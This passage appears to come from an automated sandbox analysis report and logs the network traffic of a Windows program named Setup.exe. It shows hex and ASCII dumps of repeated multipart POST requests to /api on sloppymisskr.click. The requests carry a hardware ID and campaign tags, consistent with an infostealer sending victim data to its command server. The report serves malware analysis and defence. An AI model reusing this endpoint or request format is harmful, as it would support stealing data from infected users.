                                                                                                                                                    Data Ascii: 1cacjHRiZElInIjfQj7OpCy4Tpr97jCcLmWAG/eEfUgxmAj3VhRGc3ywqqwnHPTQXs0rtt+PVL4UA+F3hOFRakf1KrYSAwg6LbCqujoc9P9Xmiv039QS+UQH4XeV5RYnQfRr5BgFDCwr+OmzL1urwU3SIPOQhl2+AkflYdW+XwVU7GnBFREPazWw8/0nUOyeDtkr+JGIVPdGDeh/lOAXOFj+YOQWBg0mIuzkuShQrctNmmK4mJ
                                                                                                                                                    2025-01-05 16:54:16 UTC1369INData Raw: 51 53 70 67 78 55 30 48 71 45 39 77 6f 6e 51 2f 77 71 38 56 67 5a 52 69 77 6d 76 72 4c 39 4b 46 43 69 77 30 33 56 4b 2f 6d 66 6e 6c 33 2b 54 77 2f 71 66 5a 2f 70 45 43 56 64 38 47 33 6d 48 77 63 4a 4c 43 4c 34 35 62 35 67 45 75 7a 42 56 70 70 30 75 4c 2b 63 55 66 31 59 43 76 4d 35 69 71 67 47 61 6c 54 32 4b 72 5a 57 42 67 67 71 4a 2f 37 34 74 53 74 58 71 64 52 46 30 79 48 31 6e 34 46 59 38 55 38 48 35 58 4f 66 36 52 55 75 58 76 64 73 37 68 5a 41 53 47 73 74 35 71 72 6c 59 48 2b 70 31 6b 6e 57 4f 72 71 6c 7a 45 32 77 56 55 66 6c 64 64 57 2b 58 79 4a 57 2b 57 6e 6c 47 51 4d 4f 49 44 6a 2b 2b 4c 73 74 57 62 37 41 53 39 51 6d 2b 34 32 47 58 50 68 50 44 75 6c 77 6b 4f 45 62 61 68 32 36 62 66 5a 57 57 45 59 4b 4a 2f 58 6d 74 7a 64 63 37 4e 6b 41 77 32 7a 2f 6b
                                                                                                                                                    Data Ascii: QSpgxU0HqE9wonQ/wq8VgZRiwmvrL9KFCiw03VK/mfnl3+Tw/qfZ/pECVd8G3mHwcJLCL45b5gEuzBVpp0uL+cUf1YCvM5iqgGalT2KrZWBggqJ/74tStXqdRF0yH1n4FY8U8H5XOf6RUuXvds7hZASGst5qrlYH+p1knWOrqlzE2wVUflddW+XyJW+WnlGQMOIDj++LstWb7AS9Qm+42GXPhPDulwkOEbah26bfZWWEYKJ/Xmtzdc7NkAw2z/k
                                                                                                                                                    2025-01-05 16:54:16 UTC1369INData Raw: 44 43 75 34 35 32 36 59 59 4d 68 4f 69 4b 73 51 56 46 41 55 68 61 4d 76 70 73 79 35 62 75 6f 5a 52 6c 44 57 34 6d 49 41 53 70 67 77 4b 34 33 47 54 39 42 41 6e 55 50 52 6b 34 52 4d 50 44 69 73 71 38 2b 2b 35 4b 31 65 76 79 30 72 49 4a 76 69 58 69 56 50 30 52 6b 65 73 4f 5a 4c 2b 58 33 49 54 79 33 33 6c 56 44 55 46 4a 53 54 35 2f 50 30 2f 45 72 57 47 53 64 5a 73 6f 4e 2b 42 57 76 74 4a 43 4f 4e 7a 6d 2b 4d 56 4a 6c 76 30 61 66 77 5a 42 41 59 6e 49 76 54 6e 73 79 52 55 70 63 31 46 33 43 7a 35 6c 63 77 63 76 6b 73 66 6f 69 48 56 30 68 67 6d 58 76 55 6f 32 78 55 4f 43 43 77 38 76 76 58 7a 4f 52 79 72 79 67 36 43 62 50 53 57 6a 46 6e 30 53 41 66 6c 64 4a 44 6c 47 43 6c 65 2f 57 44 67 45 51 51 4b 49 69 66 34 36 72 6f 6b 57 62 37 44 52 39 59 67 75 4e 48 4d 56 65
                                                                                                                                                    Data Ascii: DCu4526YYMhOiKsQVFAUhaMvpsy5buoZRlDW4mIASpgwK43GT9BAnUPRk4RMPDisq8++5K1evy0rIJviXiVP0RkesOZL+X3ITy33lVDUFJST5/P0/ErWGSdZsoN+BWvtJCONzm+MVJlv0afwZBAYnIvTnsyRUpc1F3Cz5lcwcvksfoiHV0hgmXvUo2xUOCCw8vvXzORyryg6CbPSWjFn0SAfldJDlGCle/WDgEQQKIif46rokWb7DR9YguNHMVe
                                                                                                                                                    2025-01-05 16:54:16 UTC1369INData Raw: 4f 5a 4c 71 58 33 49 54 38 32 50 38 47 41 34 50 4a 69 7a 32 37 62 4d 74 56 36 72 4e 53 64 30 71 39 5a 65 42 56 2f 31 4e 41 2b 68 72 6c 75 30 56 4a 31 6d 36 4a 4b 34 52 47 45 5a 7a 61 74 6e 6d 6c 44 42 48 76 74 41 4f 78 57 4c 68 33 34 74 65 76 68 52 48 34 58 61 63 36 52 63 69 58 50 56 75 34 42 41 47 43 79 34 6c 39 50 69 31 4c 6c 47 6e 79 55 58 49 4c 50 57 62 67 46 62 32 52 77 32 69 4e 39 58 68 42 32 6f 4c 75 6c 2f 6a 47 51 41 46 50 57 72 68 70 4b 52 67 57 36 43 47 46 70 6f 67 39 70 2b 44 58 76 4a 48 44 2b 4e 31 6d 2b 45 61 49 31 76 79 65 4f 38 53 43 41 63 6c 4a 66 2f 75 75 43 56 59 71 38 4a 49 31 57 79 32 33 34 74 4b 76 68 52 48 7a 56 36 67 70 44 34 51 45 2b 55 6b 39 31 59 48 43 6d 74 79 76 75 61 2b 4c 46 53 6a 77 45 66 57 4a 76 47 55 67 46 6e 36 51 41 37
                                                                                                                                                    Data Ascii: OZLqX3IT82P8GA4PJiz27bMtV6rNSd0q9ZeBV/1NA+hrlu0VJ1m6JK4RGEZzatnmlDBHvtAOxWLh34tevhRH4Xac6RciXPVu4BAGCy4l9Pi1LlGnyUXILPWbgFb2Rw2iN9XhB2oLul/jGQAFPWrhpKRgW6CGFpog9p+DXvJHD+N1m+EaI1vyeO8SCAclJf/uuCVYq8JI1Wy234tKvhRHzV6gpD4QE+Uk91YHCmtyvua+LFSjwEfWJvGUgFn6QA7
                                                                                                                                                    2025-01-05 16:54:16 UTC1369INData Raw: 78 34 73 51 66 31 6a 2f 42 67 4e 43 53 4d 69 39 2b 75 35 4a 56 47 71 79 6b 54 62 4b 2f 61 52 68 42 4b 77 44 41 44 36 4f 63 32 6d 50 6a 70 49 36 48 7a 6a 4e 77 30 4a 61 7a 57 77 38 2f 30 6e 55 4f 79 65 44 74 4d 2b 2f 4a 4b 65 57 2f 6c 43 43 4f 46 72 6c 4f 73 55 4f 46 54 31 62 75 6b 61 42 67 6b 74 4b 2f 76 67 73 53 64 5a 70 38 6c 43 6d 6d 4b 34 6d 4a 51 53 70 67 77 70 36 57 71 43 35 52 45 68 52 65 45 71 38 56 67 5a 52 69 77 6d 76 72 4c 39 49 31 65 6e 77 6b 37 57 4c 50 79 53 6a 45 44 78 53 77 44 72 63 6f 66 73 47 43 31 59 38 6d 48 68 45 42 49 4b 4a 54 6a 37 2b 4b 39 67 45 75 7a 42 56 70 70 30 75 4b 6d 4c 51 75 35 50 52 64 4e 76 6c 76 41 55 4a 31 2b 36 64 61 41 50 51 41 45 6e 61 71 61 71 75 79 39 56 72 38 6c 50 30 79 44 31 6d 6f 56 58 2f 30 6f 44 36 48 4f 56
                                                                                                                                                    Data Ascii: x4sQf1j/BgNCSMi9+u5JVGqykTbK/aRhBKwDAD6Oc2mPjpI6HzjNw0JazWw8/0nUOyeDtM+/JKeW/lCCOFrlOsUOFT1bukaBgktK/vgsSdZp8lCmmK4mJQSpgwp6WqC5REhReEq8VgZRiwmvrL9I1enwk7WLPySjEDxSwDrcofsGC1Y8mHhEBIKJTj7+K9gEuzBVpp0uKmLQu5PRdNvlvAUJ1+6daAPQAEnaqaquy9Vr8lP0yD1moVX/0oD6HOV
                                                                                                                                                    2025-01-05 16:54:16 UTC1369INData Raw: 79 30 63 36 34 52 44 45 5a 7a 61 76 33 74 76 69 46 57 70 63 70 42 33 53 6a 71 6c 59 74 41 2f 30 30 4d 37 33 57 56 36 78 49 67 55 76 4e 6e 34 68 73 48 41 53 51 76 76 71 54 39 4a 30 54 73 6e 67 37 37 49 66 4f 54 31 77 69 2b 55 30 6e 37 4f 5a 4c 71 58 33 49 54 2b 6d 44 72 48 41 30 46 4a 43 6e 73 36 37 73 79 58 4b 48 4d 58 4e 41 6e 2f 5a 4b 42 58 2f 31 4b 41 65 6c 31 68 2b 38 66 4b 56 69 36 4a 4b 34 52 47 45 5a 7a 61 74 33 39 71 79 70 62 6f 4e 42 46 32 79 2f 75 6b 70 77 53 73 41 77 57 35 57 6a 56 76 67 6b 36 52 50 31 31 6f 41 39 41 41 53 64 71 70 71 71 37 4b 56 71 72 77 45 44 49 4b 66 36 51 67 31 76 33 53 41 2f 68 65 5a 48 69 47 43 39 51 39 6d 48 70 46 51 38 43 49 69 54 33 35 66 31 75 48 4b 76 65 44 6f 4a 73 32 59 53 50 58 76 4d 4d 47 4b 78 67 31 65 45 54 61
                                                                                                                                                    Data Ascii: y0c64RDEZzav3tviFWpcpB3SjqlYtA/00M73WV6xIgUvNn4hsHASQvvqT9J0Tsng77IfOT1wi+U0n7OZLqX3IT+mDrHA0FJCns67syXKHMXNAn/ZKBX/1KAel1h+8fKVi6JK4RGEZzat39qypboNBF2y/ukpwSsAwW5WjVvgk6RP11oA9AASdqpqq7KVqrwEDIKf6Qg1v3SA/heZHiGC9Q9mHpFQ8CIiT35f1uHKveDoJs2YSPXvMMGKxg1eETa
                                                                                                                                                    2025-01-05 16:54:16 UTC259INData Raw: 32 56 69 41 4e 50 53 2f 35 2f 50 38 56 58 36 4c 49 53 63 78 73 35 36 44 43 45 76 38 4d 58 39 74 67 31 66 42 66 63 67 47 30 4b 76 78 57 57 45 5a 73 4b 65 7a 34 75 79 4e 4b 72 34 46 77 35 41 76 75 6c 59 74 43 2b 56 73 49 6f 6a 66 56 36 56 39 79 61 72 70 6a 36 51 30 52 45 43 59 36 2b 61 71 43 62 68 79 30 68 68 61 61 47 66 75 52 67 6c 58 6f 58 55 72 46 62 35 2f 68 44 79 31 45 39 53 71 67 56 67 5a 47 63 33 6d 77 71 72 6b 78 48 50 53 57 48 49 46 35 71 38 6a 63 41 4f 45 43 48 71 4a 76 31 62 35 4e 5a 42 50 6f 4b 72 5a 57 52 77 55 35 4f 50 6a 70 71 79 4d 62 6b 76 68 70 77 43 48 2b 69 4a 31 73 77 45 73 64 37 33 2b 43 39 31 4d 2f 55 50 52 6b 36 51 42 41 53 47 73 6c 76 72 4b 45 59 42 54 73 2b 51 43 61 4e 4c 6a 48 7a 47 66 39 51 67 6e 6c 62 34 53 72 4f 44 42 65 2f 48
                                                                                                                                                    Data Ascii: 2ViANPS/5/P8VX6LIScxs56DCEv8MX9tg1fBfcgG0KvxWWEZsKez4uyNKr4Fw5AvulYtC+VsIojfV6V9yarpj6Q0RECY6+aqCbhy0hhaaGfuRglXoXUrFb5/hDy1E9SqgVgZGc3mwqrkxHPSWHIF5q8jcAOECHqJv1b5NZBPoKrZWRwU5OPjpqyMbkvhpwCH+iJ1swEsd73+C91M/UPRk6QBASGslvrKEYBTs+QCaNLjHzGf9Qgnlb4SrODBe/H
                                                                                                                                                    2025-01-05 16:54:16 UTC1369INData Raw: 33 32 62 63 0d 0a 56 6b 35 47 4c 57 71 6d 75 76 4e 67 57 4c 32 47 46 6f 70 2b 6f 38 72 66 42 61 34 65 47 4b 78 67 31 66 42 66 63 67 47 30 4b 76 78 57 57 45 5a 73 4b 65 7a 34 75 79 4e 4b 72 34 46 77 35 41 4c 2f 6d 59 6c 56 37 67 34 70 36 57 32 53 70 6c 46 71 58 4c 6f 79 31 31 5a 49 52 68 52 6b 76 76 4c 39 65 42 79 5a 78 55 44 55 4b 2b 36 4f 77 58 7a 35 53 67 4c 6c 61 64 66 49 46 44 35 55 75 69 53 75 45 45 42 65 65 32 53 2b 37 71 78 67 42 50 79 55 46 59 39 2f 72 38 2f 65 54 62 42 56 52 2f 51 35 7a 62 52 52 61 6b 47 36 4d 71 35 52 41 78 51 35 4c 50 33 38 76 6d 64 69 6b 73 56 59 31 79 50 7a 6e 72 4a 73 30 45 45 47 34 58 66 58 31 77 6b 6e 51 2f 6c 76 36 53 67 2b 43 43 77 2b 2b 65 53 37 49 42 7a 69 68 6b 47 61 64 4d 48 66 78 42 4c 42 41 6b 66 36 4f 63 32 6d 4b
                                                                                                                                                    Data Ascii: 32bcVk5GLWqmuvNgWL2GFop+o8rfBa4eGKxg1fBfcgG0KvxWWEZsKez4uyNKr4Fw5AL/mYlV7g4p6W2SplFqXLoy11ZIRhRkvvL9eByZxUDUK+6OwXz5SgLladfIFD5UuiSuEEBee2S+7qxgBPyUFY9/r8/eTbBVR/Q5zbRRakG6Mq5RAxQ5LP38vmdiksVY1yPznrJs0EEG4XfX1wknQ/lv6Sg+CCw++eS7IBzihkGadMHfxBLBAkf6Oc2mK
                                                                                                                                                    2025-01-05 16:54:16 UTC1369INData Raw: 31 6f 41 39 41 45 47 74 79 72 4b 54 39 4d 68 7a 30 68 67 6e 5a 50 75 71 5a 6a 30 54 39 43 7a 6e 63 58 70 76 68 48 6a 78 44 39 32 62 50 46 52 45 4d 46 52 54 72 36 62 4d 75 57 37 72 58 44 70 52 73 39 39 2f 55 61 37 34 45 52 39 30 33 31 66 35 66 63 68 50 50 61 65 41 59 42 78 41 36 5a 39 6e 6b 75 69 46 4b 76 4d 74 43 2b 79 2f 70 6c 63 77 63 76 6b 70 48 75 69 76 62 70 68 73 37 45 36 49 36 76 45 31 56 56 58 78 36 72 50 58 7a 4f 52 79 36 68 68 61 49 59 72 69 4e 7a 41 71 2b 43 77 54 77 61 35 50 6c 43 53 6b 55 78 46 54 4c 41 51 4d 57 4c 53 6e 41 31 4a 59 73 57 71 76 63 53 64 77 4b 32 4e 2f 43 45 76 45 4d 58 39 73 35 33 61 59 67 5a 42 50 69 4b 72 5a 57 4e 51 55 6c 4a 50 6e 38 72 47 31 35 75 38 56 65 33 43 2b 34 30 63 78 55 76 68 52 58 72 44 6d 52 39 31 39 79 41 36
                                                                                                                                                    Data Ascii: 1oA9AEGtyrKT9Mhz0hgnZPuqZj0T9CzncXpvhHjxD92bPFREMFRTr6bMuW7rXDpRs99/Ua74ER9031f5fchPPaeAYBxA6Z9nkuiFKvMtC+y/plcwcvkpHuivbphs7E6I6vE1VVXx6rPXzORy6hhaIYriNzAq+CwTwa5PlCSkUxFTLAQMWLSnA1JYsWqvcSdwK2N/CEvEMX9s53aYgZBPiKrZWNQUlJPn8rG15u8Ve3C+40cxUvhRXrDmR919yA6


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    2192.168.2.449750104.21.90.1094436860C:\Users\user\Desktop\Setup.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-05 16:54:18 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=LZCUHPS6R
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                    Content-Length: 18108
                                                                                                                                                    Host: sloppymisskr.click
                                                                                                                                                    2025-01-05 16:54:18 UTC15331OUTData Raw: 2d 2d 4c 5a 43 55 48 50 53 36 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 35 31 35 42 38 42 38 43 45 46 37 44 36 35 45 33 41 39 45 45 32 44 31 36 30 32 30 36 31 36 30 0d 0a 2d 2d 4c 5a 43 55 48 50 53 36 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4c 5a 43 55 48 50 53 36 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 4c 5a 43 55 48 50 53 36 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
                                                                                                                                                    Data Ascii: --LZCUHPS6RContent-Disposition: form-data; name="hwid"D515B8B8CEF7D65E3A9EE2D160206160--LZCUHPS6RContent-Disposition: form-data; name="pid"2--LZCUHPS6RContent-Disposition: form-data; name="lid"hRjzG3--TRON--LZCUHPS6RContent-Dispo
                                                                                                                                                    2025-01-05 16:54:18 UTC2777OUTData Raw: 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35 8b 56 2d 7b
                                                                                                                                                    Data Ascii: \f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5V-{
                                                                                                                                                    2025-01-05 16:54:18 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                    Date: Sun, 05 Jan 2025 16:54:18 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Set-Cookie: PHPSESSID=qeer97dh8mqf26v3ie0s71og90; expires=Thu, 01 May 2025 10:40:57 GMT; Max-Age=9999999; path=/
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                    vary: accept-encoding
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fdOX69eaq4WA0vovQqz6Jq1oACdlb%2Bi02XG57bhGwt6ROnEC49vLoZ9ieGlKjZDUB3kdrEP1lLiMToWU3VdnbYf6frjgGPuH1QZJKVp%2FMLB9Y0A5XMbfc00GlC3zH8brjmXRx2A%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 8fd4fd4bff861921-EWR
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1478&min_rtt=1478&rtt_var=739&sent=12&recv=23&lost=0&retrans=1&sent_bytes=4232&recv_bytes=19063&delivery_rate=362507&cwnd=139&unsent_bytes=0&cid=2dd9f521e7515f13&ts=712&x=0"
                                                                                                                                                    2025-01-05 16:54:18 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                                                    2025-01-05 16:54:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    3192.168.2.449752104.21.90.1094436860C:\Users\user\Desktop\Setup.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-05 16:54:19 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=YDRKR53H0UXY5E
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                    Content-Length: 8759
                                                                                                                                                    Host: sloppymisskr.click
                                                                                                                                                    2025-01-05 16:54:19 UTC8759OUTData Raw: 2d 2d 59 44 52 4b 52 35 33 48 30 55 58 59 35 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 35 31 35 42 38 42 38 43 45 46 37 44 36 35 45 33 41 39 45 45 32 44 31 36 30 32 30 36 31 36 30 0d 0a 2d 2d 59 44 52 4b 52 35 33 48 30 55 58 59 35 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 59 44 52 4b 52 35 33 48 30 55 58 59 35 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 59 44 52 4b 52 35 33 48 30
                                                                                                                                                    Data Ascii: --YDRKR53H0UXY5EContent-Disposition: form-data; name="hwid"D515B8B8CEF7D65E3A9EE2D160206160--YDRKR53H0UXY5EContent-Disposition: form-data; name="pid"2--YDRKR53H0UXY5EContent-Disposition: form-data; name="lid"hRjzG3--TRON--YDRKR53H0
                                                                                                                                                    2025-01-05 16:54:20 UTC1130INHTTP/1.1 200 OK
                                                                                                                                                    Date: Sun, 05 Jan 2025 16:54:20 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Set-Cookie: PHPSESSID=vq90ps582s8fp5ff0sq57d0r5t; expires=Thu, 01 May 2025 10:40:58 GMT; Max-Age=9999999; path=/
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                    vary: accept-encoding
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zi7OnGYiJDa98pNwRRMPOwJFxIRQajhIWYKdy51KfeOyFZzUCKozdEqjPCP7LHiWqw2qQgUkowlc%2BIz%2FmMq5zANFpOQNEbfttRk86qrXpZiOXM8ppXCpybwq%2BPnCRaDNFzG5v48%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 8fd4fd54fc484408-EWR
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2533&min_rtt=2494&rtt_var=1014&sent=8&recv=13&lost=0&retrans=0&sent_bytes=2846&recv_bytes=9696&delivery_rate=1039145&cwnd=206&unsent_bytes=0&cid=3b3a13e79ddcec20&ts=573&x=0"
                                                                                                                                                    2025-01-05 16:54:20 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                                                    2025-01-05 16:54:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    4192.168.2.449753104.21.90.1094436860C:\Users\user\Desktop\Setup.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-05 16:54:21 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=UMY21CEW4IOI
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                    Content-Length: 20400
                                                                                                                                                    Host: sloppymisskr.click
                                                                                                                                                    2025-01-05 16:54:21 UTC15331OUTData Raw: 2d 2d 55 4d 59 32 31 43 45 57 34 49 4f 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 35 31 35 42 38 42 38 43 45 46 37 44 36 35 45 33 41 39 45 45 32 44 31 36 30 32 30 36 31 36 30 0d 0a 2d 2d 55 4d 59 32 31 43 45 57 34 49 4f 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 55 4d 59 32 31 43 45 57 34 49 4f 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 55 4d 59 32 31 43 45 57 34 49 4f 49 0d 0a 43
                                                                                                                                                    Data Ascii: --UMY21CEW4IOIContent-Disposition: form-data; name="hwid"D515B8B8CEF7D65E3A9EE2D160206160--UMY21CEW4IOIContent-Disposition: form-data; name="pid"3--UMY21CEW4IOIContent-Disposition: form-data; name="lid"hRjzG3--TRON--UMY21CEW4IOIC
                                                                                                                                                    2025-01-05 16:54:21 UTC5069OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b
                                                                                                                                                    Data Ascii: lrQMn 64F6(X&7~`aO
                                                                                                                                                    2025-01-05 16:54:21 UTC1139INHTTP/1.1 200 OK
                                                                                                                                                    Date: Sun, 05 Jan 2025 16:54:21 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Set-Cookie: PHPSESSID=0jtrttkl2nf5ie1m84u59ma1ln; expires=Thu, 01 May 2025 10:41:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                    vary: accept-encoding
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qmQk%2FpmrtdxujWFNP2qIdGKhA%2Bcc1HPgsrJBjLfxMUT2xqe0SJDE2iEA5tGklBIMoC1c3y8uDyAlQSPDpOnUfRbNOARMm9q%2FOfFM8%2FDtW62BttYVlUmwOhrvIF%2Fk%2BDM%2BCQodmtA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
